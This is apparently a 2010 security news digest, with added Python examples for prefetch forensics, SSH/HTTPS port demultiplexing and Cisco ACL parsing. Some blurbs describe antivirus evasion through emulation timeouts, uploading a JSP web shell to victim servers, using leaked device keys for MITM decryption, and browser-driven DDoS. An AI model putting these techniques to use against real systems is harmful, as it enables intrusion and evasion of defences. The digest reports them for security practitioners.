In this post, I will first look at how I was able to evade detection by many AV products simply by using a different compiler and by stripping debugging symbols. Then, I will look at how I was able to defeat Microsoft's (and many other AV products') detection mechanisms simply by 'waiting out' the timeout period of their simulations of my program's execution. However, a quick note before we begin: I'm by no means an expert on antivirus, as this exercise was partly to further my understanding of how AV works, and these explanations and techniques are based on my admittedly poor understandings of the technologies behind them. If I mistakenly claim something that isn't true, or you can shed light on some areas that I neglect, please comment. I would love to learn from you.

 
The purpose of this article is to explore the many different forensic artifacts that can be discovered from Windows prefetch files. The first section will briefly cover the prefetch file and the prefetching process. The second section, will discuss the forensic values of the prefetch file, specifically the forensic artifacts the prefetch file contains, and the story that can be revealed by the mere existence or absence of prefetch files. The article will conclude with some examples of how you can use prefetch files to aid in forensic analysis and what to watch out for when using prefetch files to prove or disprove a case.
The main purpose of this article is to explain the use of prefetching in forensic analysis, but it is important to have a baseline understanding of the technology to provide a good foundation for how and why prefetch files contain certain artifacts. The prefetching process utilized by Microsoft was created to speed up the Windows operating system and application startup. The prefetching process occurs when the operating system, specifically the Windows Cache Manager, monitors certain elements of data that are extracted from the disk into memory. This monitoring occurs each time the system is started for the first two minutes of the boot process, then sixty seconds after all the Win32 services have completed their startup, and the first ten seconds after an application is executed.
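The artifacts the article goes on to describe live at fixed offsets in the prefetch file: the version at offset 0, the "SCCA" signature at 4, the UTF-16 executable name at 0x10, the path hash at 0x4C, and a FILETIME last-run timestamp and a run count whose offsets depend on the version (0x78/0x90 for version 17, XP and 2003; 0x80/0x98 for version 23, Vista and 7). The parser below is an added example for this summary, not the article's code; build_sample_prefetch constructs a fixture with those fields filled in and is not a real prefetch file.

```python
import datetime
import struct

# version -> (offset of last-run FILETIME, offset of run count)
OFFSETS = {17: (0x78, 0x90), 23: (0x80, 0x98)}
EPOCH_1601 = datetime.datetime(1601, 1, 1, tzinfo=datetime.timezone.utc)


def filetime_to_datetime(ft: int) -> datetime.datetime:
    """FILETIME is 100-nanosecond intervals since 1601-01-01 UTC."""
    return EPOCH_1601 + datetime.timedelta(microseconds=ft // 10)


def parse_prefetch(data: bytes) -> dict:
    version, sig = struct.unpack_from("<I4s", data, 0)
    if sig != b"SCCA":
        raise ValueError("missing SCCA signature: not an uncompressed prefetch file")
    if version not in OFFSETS:
        raise ValueError("unsupported prefetch version %d" % version)
    exe = data[0x10:0x10 + 60].decode("utf-16-le").split("\0", 1)[0]
    prefetch_hash = struct.unpack_from("<I", data, 0x4C)[0]  # the hash that appears in the filename
    lr_off, rc_off = OFFSETS[version]
    last_run = struct.unpack_from("<Q", data, lr_off)[0]
    run_count = struct.unpack_from("<I", data, rc_off)[0]
    return {"version": version, "executable": exe, "hash": "%08X" % prefetch_hash,
            "last_run": filetime_to_datetime(last_run), "run_count": run_count}


def build_sample_prefetch(version: int, exe: str, last_run_ft: int, run_count: int) -> bytes:
    """Constructed fixture with only the fields parse_prefetch reads; not a real prefetch file."""
    buf = bytearray(0x100)
    struct.pack_into("<I4s", buf, 0, version, b"SCCA")
    struct.pack_into("<I", buf, 0x0C, len(buf))                   # file size field
    buf[0x10:0x10 + 60] = exe.encode("utf-16-le").ljust(60, b"\0")
    struct.pack_into("<I", buf, 0x4C, 0x3CDDC0E5)                 # arbitrary hash value
    lr_off, rc_off = OFFSETS[version]
    struct.pack_into("<Q", buf, lr_off, last_run_ft)
    struct.pack_into("<I", buf, rc_off, run_count)
    return bytes(buf)


# FILETIME for 2010-01-01 00:00:00 UTC = (1262304000 + 11644473600) * 10**7
FT_2010_01_01 = 129067776000000000

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(parse_prefetch(f.read()))
    else:
        print(parse_prefetch(build_sample_prefetch(23, "EVIL.EXE", FT_2010_01_01, 7)))
```

When running this over a real C:\Windows\Prefetch, remember the cases the article warns about: Windows Server editions and systems with prefetching disabled produce no files at all, XP and 7 cap the directory at 128 entries so older evidence is evicted, and the last-run time on version 17/23 files is a single timestamp, not a history.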

 
Dstat is a versatile replacement for vmstat, iostat, netstat and ifstat. Dstat overcomes some of their limitations and adds some extra features, more counters and flexibility. Dstat is handy for monitoring systems during performance tuning tests, benchmarks or troubleshooting.
Dstat allows you to view all of your system resources in real time; you can, for example, compare disk utilization with interrupts from your IDE controller, or compare the network bandwidth numbers directly with the disk throughput (in the same interval).




Cloud Security


 
The Cloud Security Alliance's matrix is a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains
The Cloud Security Alliance (CSA) has launched a revision of the Cloud Controls Matrix (CCM). The new matrix (version 1.1), available for free download here, is designed to provide fundamental security principles to guide cloud vendors and help prospective cloud customers assess the overall security risk of a cloud provider.
The matrix provides a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains. The foundations of the CCM rest on its customized relationship to other industry-accepted security standards, regulations, and controls frameworks such as ISO 27001/27002, ISACA COBIT, PCI, and NIST. The latest version includes more thorough mapping around NIST and GAAP, as part of more 'holistic guidance', according to CSA.

 
Malware Persistence in the Cloud  [fasthorizon.blogspot.com]
The cloud is certainly going to change some things about malware infection. When a desktop is reset to clean state every time an employee logs in, you now have to wonder how malicious attackers are going to maintain persistent access to the Enterprise. This is similar to what happens when an infected computer is re-imaged only to end-up infected all over again.
There are several ways to maintain persistent access without having an executable-in-waiting on the filesystem. Memory-only based injection is an old concept. It has the advantage of defeating disk-based security. One common observation is that such malware doesn't survive reboot. That is true in the sense that the malware is not a service or a driver - but this doesn't mean the malware will go away. Stated differently, the malware can still be persistent even without a registry key to survive reboot. This applies to the problem of re-infection after re-imaging (a serious and expensive problem today in the Enterprise) and it also applies to the future of cloud computing (where desktop reset is considered a way to combat malware persistence).




Privacy


 
I love Pandora. I really couldn't do without it. But I could do without its sending my demographic information, phone ID, and location to eight trackers across six companies. And Pandora's far from the worst offender, the WSJ shows us.
The Journal's report lays bare much of what we already suspected, or outright knew but didn't bother thinking about: iOS and Android apps are having a field day with your personal info. More than half of the 101 popular apps they tested sent your UDID to companies without your awareness or consent. Nearly as many sent your location, and a handful even sent along demographic info and other personal details to advertisers.

 
Court Rebuffs Obama on Warrantless Cell-Site Tracking
A federal appeals court on Wednesday rejected the Obama administration's contention that the government is never required to get a court warrant to obtain cell-site information that mobile-phone carriers retain on their customers.
The decision by the 3rd U.S. Circuit Court of Appeals is one in a string of court decisions boosting Americans' privacy in the digital age - rulings the government fought against.




Mobile Security


 
ENISA Smartphone Security Report  [1raindrop.typepad.com]
Here is a new Smartphone Security report from ENISA that I contributed to -
'A new ENISA report identifies the top security risks and opportunities of smartphone use and gives practical security advice for businesses, consumers and governments. Top risks include spyware, poor data cleansing when recycling phones, accidental data leakage, and unauthorised premium-rate phonecalls and SMSs.'

 
As more people adopt smartphones, criminals will find new ways to use them for no good
Smartphones could soon be used to launch distributed attacks, much like traditional PCs are now used as parts of larger botnet networks, according to a new report from ENISA, the European Network and Information Security Agency. In research that details the many risks of smartphones, the findings claim that while the devices are not currently being targeted for such attacks, this may change as mobile devices are becoming more popular, more connected and the complexity and the number of vulnerabilities in these platforms is increasing.

 
Apple pulls jailbreak detection from iOS 4, and InfoWorld catches Androids that lie about Exchange policy support -- so what can IT trust?
Much of security is built on trust, but it turns out you can't always believe a mobile device's claims. They can be programmed to lie about their capabilities, as in the case of several Android devices, as well as jailbroken iPhones and iPads. Thus, they can appear to conform to IT security policies managed via Microsoft's Exchange ActiveSync (EAS) protocol even when they don't. Two recent events show that trust may be misplaced in the mobile world.
Last week, Apple quietly dropped its jailbreak detection capability from iOS 4's APIs, so iPhones and iPads can't report whether they've been jailbroken. (Apple did not comment.) Jailbreaking, although legal, can compromise a device, allowing malware and worse into the corporate network. Indeed, the few reported cases of iPhone viruses have occurred on jailbroken units.

 
Android Touch-Event Hijacking  [blog.mylookout.com]
With the recent release of Android 2.3 (Gingerbread), developers can now protect themselves from a new twist on an old bug: TapJacking. Like ClickJacking on the web, TapJacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it. Using this technique, an attacker could potentially trick a user into making purchases, clicking on ads, installing an application, granting permissions, or even wiping all of the data from their phone.

 
Messing with Droid X  [www.secmaniac.com]
I just got a Droid X last week; before getting it I made sure efuse (https://secure.wikimedia.org/wikipedia/en/wiki/EFUSE) was bypassed, or it wouldn't be fun having a stock Android. I'll outline the steps I've taken so far to customize my themes, root my droid, fix the market, overclock, and more. I'm going to simplify most of these for apps that are already out in the market now; I decided to do mine from scratch, but this makes posting a lot easier.
First things first, let's get root on the Droid X. The easiest way I found was using adb shell. Before diving down, read up on adb, it's really easy... It's a direct interface with your Droid and you can download the SDK packages from Google.
Great tutorial on rooting the Droid X: http://www.simplehelp.net/2010/10/11/how-to-root-your-droid-x-using-os-x/
In simplistic terms, put your Droid X into debugging mode under settings and applications, fire up the shell script through ADB and you're running as root.




Cryptography / Encryption


 
Karsten Nohl of Security Research Labs, a white-hat hacker, believes that a recent spike in car theft is due to a break in the car immobilizer security systems; thieves are able to re-mobilize the immobilized vehicles. My question is: how long until someone builds a TV-B-Gone for car engines that lets you stop cars with the click of a button?

 
Some time ago, I started thinking about the possibility of using Rainbow Tables to crack old-school Unix crypt(3) passwords. Nobody had done this, and the reason most often cited was the presence of the two-character salt at the beginning of the hash.
This didn't make a whole lot of sense to me. I mean, 2 characters? Isn't that essentially like taking an 8-character password space and making it a 10-character space? People are already creating 10-character tables for other hash algorithms. Why can't we do this for crypt(3)?
Turns out, it's not that difficult. Over a few nights, I managed to work some rough hacks into the source for linuxrainbowcrack, and it seems like it's working. I haven't actually built a set of tables (other than small test tables) because I'm sure the code could be better optimized, and I simply don't have the horsepower. But I'm hoping that others can both optimize the code, and generate and distribute tables.




General


 
In 2003, George Mason University PhD candidate Sean Gorman mapped critical fiber optic networks across the U.S. and illustrated that vulnerabilities in the communications infrastructure could easily be identified using data and records available to the general public.
The study also concluded that there are multiple 'choke points' that could be targeted which would cripple Internet functionality, and revealed the lack of redundant systems that would ensure continued operability.
Now Swiss researchers suggest that Internet backbones are unduly susceptible to attack, which could potentially cripple critical communications and infrastructure operations.

 
Thanks to database breaches like those suffered by RockYou and Gawker, leaked passwords on Pastebin, and password caches stored in Malware like Conficker, the criminals of the world have an impressive starting point to guessing your passwords.

 
According to Techspot (Thanks Richard!), Intel's new Core processors (Sandy Bridge), which will hit the market for desktops and laptops in early 2011, have a remote kill switch (called Anti-Theft v3.0). This technology embedded in the CPU allows the user to remotely disable the processor through 3G, that is, even when the computer is not connected to the Internet or is switched off.
Intel's goal is to offer the user the capability to remotely shut down the computer if it is lost or stolen. Somehow, this is similar to what most modern mobile device platforms offer today to remotely lock, show a message, or wipe a stolen or lost device, such as Windows Mobile 6.5, iPhone, iPad... I guess that, in any case, the thief will be able to replace the CPU with a new one and make the computer work again. Is Intel planning to add remote disk wiping capabilities from the processor too? ;)

 
Google has started warning users when they are about to visit web sites which may have been hacked. Google has long warned users when search results include sites which spread malware and now plans to detect web sites which may have been hacked, without the owner's consent, for purposes such as phishing or spamming.

 
from the nike-picks-up-the-RIAA-strategy dept
Warning: you might not want to ever buy Nike shoes again. If you accidentally buy a counterfeit pair of shoes, Nike might sue you. Via Glyn Moody, we learn that Nike chose to sue a guy who ordered a single pair of trainers online, believing they were legitimate Nike shoes. The shoes were seized at the UK border as counterfeits. Nike could have gone after the actual counterfeiters. Or it could have (perhaps more questionably) gone after some other third parties, such as the retailers who sold the shoes. Instead, it chose option 3 and sued the buyers directly. Most of the suits were settled (or, apparently, ignored).

 
If you're an avid Skype user, you're probably aware that Skype's been suffering downtime today. They've updated their blog with more details (in short, supernodes went down, so they're creating new mega-supernodes, obviously), but it's likely going to be a few more hours before your Skype account is back up and running. It's got to be bad timing for Skype (and Skype users), considering the amount of video calling I'm sure goes on during the holidays. (I just video chatted my family last night.)

 
Riptides can carry hapless swimmers out into the ocean very quickly - by the time a lifeguard is able to swim out to rescue them, it may be too late. Using a Jet Ski to reach struggling swimmers is one option, although such watercraft can be expensive, problematic to store on-site, and difficult to launch for one person. Now, seaside municipalities can get something cheaper and easier for reaching those swimmers-in-distress: an electric remote-control motorized rescue buoy called EMILY.




Tools


 
VMware Fusion 3.1  [store.vmware.com]
Enjoy the Holiday Season with VMware Exclusive Deals!
Get 15% OFF VMware Fusion 3 and $30 Rebate. The price drops from $79.99 to $37.99 after Rebate.
Offer valid through Jan 7th 2011 @ 5:00 PM (PST), Act Now!

 
Samurai 0.9.5 released  [sourceforge.net]
The Samurai Web Testing Framework is a LiveCD focused on web application testing. We have collected the top testing tools and pre-installed them to build the perfect environment for testing applications.

 
web.config Security Analyzer  [www.wcanalyzer.com]
Analyze your web.config file against security vulnerabilities.

 
littleblackbox  [code.google.com]
Database of private SSL keys for embedded devices
LittleBlackBox is a collection of thousands of private SSL keys extracted from various embedded devices. These private keys are stored in a database where they are correlated with their public SSL certificates as well as the hardware/firmware that are known to use those SSL keys.
A command line utility is included to aid in the identification of devices or network traffic that use these known private keys. Given a public SSL certificate, the utility will search the database to see if it has a corresponding private key; if so, the private key is displayed and can be used for traffic decryption or MITM attacks. Alternatively, it will also display a table of hardware and firmware that is known to use that private key.

 
INSECT  [www.insecurityresearch.com]
INSECT Pro is a penetration security auditing and testing software solution designed to allow organizations of all sizes to mitigate, monitor and manage the latest security threats and vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications.
INSECT can help to build a strong security posture that is easy to use so both professional penetration testers and less experienced security pros will have all the tools they need to reduce costs, proactively find vulnerabilities, assess risk, and check the effectiveness of security defenses.

 
New sshttp feature trickery  [c-skills.blogspot.com]
sshttp is now able to hide SSH inside HTTPS as well.
SSH behind HTTP was possible before, and so was HTTPS,
but now it is 'official' :)
You cannot mix HTTP and HTTPS in the same instance,
but you can run multiple sshttpd's.
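As an added illustration (not code from sshttp or its author), here is a small Python analogue of what I assume sshttp does per connection: peek at the first bytes the client sends on the shared port and hand the socket to sshd or the web server accordingly. This version classifies SSH, HTTP and TLS in one listener, which goes beyond the single-instance limit the post describes; the backend addresses, the sample first-bytes and the function names are made up for the example.

```python
import select
import socket

# Constructed sample first-bytes a client sends right after the TCP handshake.
SAMPLES = {
    "ssh": b"SSH-2.0-OpenSSH_5.6\r\n",
    "tls": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x01",  # record header + ClientHello start
    "http": b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "junk": b"\x00\x00\x00\x00",
}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")
# Hypothetical backends on this host; sshttpd proper forwards to the real sshd/httpd.
BACKENDS = {"ssh": ("127.0.0.1", 22), "tls": ("127.0.0.1", 4433), "http": ("127.0.0.1", 8080)}

def classify(first_bytes: bytes) -> str:
    # Works when the client speaks first: HTTP and TLS clients always do, and many
    # SSH clients send their identification string right away (see handle() for the rest).
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    # TLS record: content type 0x16 (handshake), version 3.x, 2-byte length,
    # then handshake type 0x01 (ClientHello).
    if (len(first_bytes) >= 6 and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03 and first_bytes[5] == 0x01):
        return "tls"
    if first_bytes.startswith(HTTP_METHODS):
        return "http"
    return "unknown"

def choose_backend(first_bytes: bytes):
    # (host, port) to forward to, or None to drop the connection.
    return BACKENDS.get(classify(first_bytes))

def handle(client: socket.socket, peek_timeout: float = 3.0) -> str:
    # Demultiplex one accepted connection: peek, pick a backend, relay bytes.
    # MSG_PEEK leaves the data queued, so the backend sees a byte-exact stream.
    client.settimeout(peek_timeout)
    try:
        kind = classify(client.recv(16, socket.MSG_PEEK))
    except socket.timeout:
        # Silent client: SSH servers speak first and not every SSH client sends its
        # banner before reading the server's, so a silent client is assumed to be SSH.
        kind = "ssh"
    target = BACKENDS.get(kind)
    if target is None:
        client.close()
        return kind
    backend = socket.create_connection(target)
    client.settimeout(None)
    peer = {client: backend, backend: client}
    while True:
        readable, _, _ = select.select(list(peer), [], [])
        for sock in readable:
            data = sock.recv(65536)
            if not data:  # one side hung up: tear down both
                for s in peer:
                    s.close()
                return kind
            peer[sock].sendall(data)
```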

 
I just completed a pretty massive update of the Backtrack 4 Full Disk Encryption How-to.

 
d0z.me: The Evil URL Shortener  [spareclockcycles.org]
The Inspiration
I, like many people, have been closely following a lot of the chaos happening around the recent Wikileaks dump, and was particularly fascinated by the DDoS attacks by activists on either side. One tool specifically caught my eye in the midst of the attacks, however: the JS LOIC. The tool works simply by constantly altering an image file's source location, so that the browser is forced to continuously hammer the targeted server with HTTP requests. Not a sophisticated or technically interesting tool by any means, but conceptually interesting in that it only requires a browser to execute one's portion of a DoS attack. While the concept itself is not all that new, it got me thinking about the implications of such browser based DoS attacks. Clearly, it opens the door for the creation of a DDoS botnet without ever having to actually exploit the hosts participating in the network; all that is required is to get some Javascript to run in the participants' browsers.

 
Malwarebytes' Anti-Malware 1.50.1  [forums.malwarebytes.org]
Malwarebytes' Anti-Malware 1.50.1 has been released. This version is a bugfix release, and fixes a number of minor stability issues in the 1.50 release build. If you had issues with 1.50, please let us know if 1.50.1 resolves them.

 
ProcDump v3.01  [technet.microsoft.com]
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.

 
pwnshell  [i8jesus.com]
If you've got arbitrary file uploads to a J2EE web accessible directory, you need something to maximize your compromise. The world needs a JSP shell that really helps a blackbox attacker pivot to important assets, so I took a stab at it. It's, quite lamely, called pwnshell. It's a single JSP that, when browsed to, delivers the user a Web 2.0 shell for the victimized server. Great for demos! The shell is here.
How do you use it?
1. Upload it to the victim server (try it on a local Tomcat server!)
2. Browse to it
3. Pretend you're looking at xterm

 
Download Armitage 12.22.10  [www.fastandeasyhacking.com]

 
Cisco ACL Parser v0.04  [www.melcara.com]
Here is a new version of the ACL parser. I fixed a lot of issues with this script. The object groups are now expanded for the PIX and ASA. I have added the attributes for ACL entries for log level, time, and inactive state. I enhanced the remark feature also. The script was verified and tested by Anthony, who contacted me after my initial public release v2. Anthony ran the script against an ASA 7.x with an ACL that totals over 5000 lines. Here is a quote from his response after testing:
"This is truly a parsing masterpiece. This did exactly what I needed and meets all of my requirements perfectly. Had no issues with any of the lines in the over 5000 lines of a single ACL that I ran through it, wonderful! Saved me days of work! Seriously!!! Thanks a million. I know this wasn't easy... especially since your script more than doubled!!"
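To show what the features listed above amount to in practice, here is an added Python example (not the melcara.com script) that parses a constructed ASA snippet: it expands object-groups into one row per source/destination/port combination and carries the remark, log level, time-range and inactive flag on each row. The configuration, group names and function names are all made up; source-port specifications and ACL syntax outside this subset are not handled.

```python
import itertools

# Constructed sample ASA configuration (not taken from any real device).
SAMPLE_CONFIG = """\
object-group network WEB_SERVERS
 network-object host 10.0.0.5
 network-object 10.0.1.0 255.255.255.0
object-group service WEB_PORTS tcp
 port-object eq 80
 port-object eq 443
access-list OUTSIDE_IN remark Allow web traffic to the DMZ
access-list OUTSIDE_IN extended permit tcp any object-group WEB_SERVERS object-group WEB_PORTS log 6 time-range BUSINESS_HOURS inactive
access-list OUTSIDE_IN extended deny ip any any log
"""

def parse_object_groups(lines):
    # name -> members, e.g. "10.0.0.5", "10.0.1.0 255.255.255.0", "eq 80"
    groups, cur = {}, None
    for line in lines:
        p = line.split()
        if line.startswith("object-group "):
            cur, groups[p[2]] = p[2], []
        elif line.startswith(" ") and cur:  # network-object / port-object member line
            groups[cur].append(p[2] if p[1] == "host" else " ".join(p[1:]))
        else:
            cur = None
    return groups

def take(tok, i, groups):
    # Expand one operand: any | host A | eq PORT | object-group NAME | NET MASK
    t = tok[i]
    if t == "any": return ["any"], i + 1
    if t in ("host", "eq"): return [tok[i + 1] if t == "host" else f"eq {tok[i + 1]}"], i + 2
    if t == "object-group": return list(groups[tok[i + 1]]), i + 2
    return [f"{t} {tok[i + 1]}"], i + 2

def parse_acl(config):
    # One row per (src, dst, port) combination, carrying remark, log level, time-range, inactive.
    lines = config.splitlines()
    groups = parse_object_groups(lines)
    rows, remark = [], None
    for line in lines:
        tok = line.split()
        if not line.startswith("access-list "): continue
        if tok[2] == "remark":
            remark = " ".join(tok[3:])
            continue
        name, action, proto = tok[1], tok[3], tok[4]  # tok[2] is "extended"
        srcs, i = take(tok, 5, groups)
        dsts, i = take(tok, i, groups)
        # Destination port is optional; anything else at this position is a trailing keyword.
        ports, i = take(tok, i, groups) if i < len(tok) and tok[i] in ("eq", "object-group") else (["any"], i)
        opts = {"inactive": "inactive" in tok[i:], "time_range": None, "log": None}
        if "time-range" in tok[i:]:
            opts["time_range"] = tok[tok.index("time-range", i) + 1]
        if "log" in tok[i:]:
            j = tok.index("log", i) + 1
            opts["log"] = int(tok[j]) if j < len(tok) and tok[j].isdigit() else 6  # ASA default level
        base = {"acl": name, "action": action, "proto": proto, "remark": remark, **opts}
        for src, dst, port in itertools.product(srcs, dsts, ports):
            rows.append({**base, "src": src, "dst": dst, "port": port})
        remark = None
    return rows
```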

 
Rebasing the dynamic linker DYLD to improve Snow Leopard's fake ASLR
INTRODUCTION
Last week at the Power of Community 2010 (POC2010) security conference in Seoul Charlie Miller presented his talk about the changes in Snow Leopard security. An important message of his talk was that Apple's failure to load the dynamic linker DYLD at a random base address is a major weakness from a security point of view. Charlie demonstrated how a ROP payload can be built that only uses parts of the non-randomized DYLD binary. You can download his slides here.
At the same conference I presented my research into adding ASLR to jailbroken iPhones, which also mentioned the fact that there are several similarities between iOS and Mac OS X Snow Leopard in regards to the DYLD and the dyld_shared_cache. I also mentioned that not rebasing the DYLD binary is a major weakness because it contains enough code to kickstart shellcode with a ROP stub based on DYLD only. Therefore it was pretty straightforward to just apply my research into rebasing the DYLD binary from iOS to Mac OS X Snow Leopard, which is presented here. You can download my slides here and the antid0te iPhone security tool will be available here once it is released.

 
This weekly update for Metasploit Pro and Metasploit Express 3.5.1 brings three new modules, and updates to the pcap import and nexpose functionality.




Funny


 
Software Engineering explained  [alexandre.gramfort.net]

 
What shall we call it?  [www.downrightaverage.com]

 
Don't leak on me  [yfrog.com]

 
Jiu Jitsu  [www.stevekwan.com]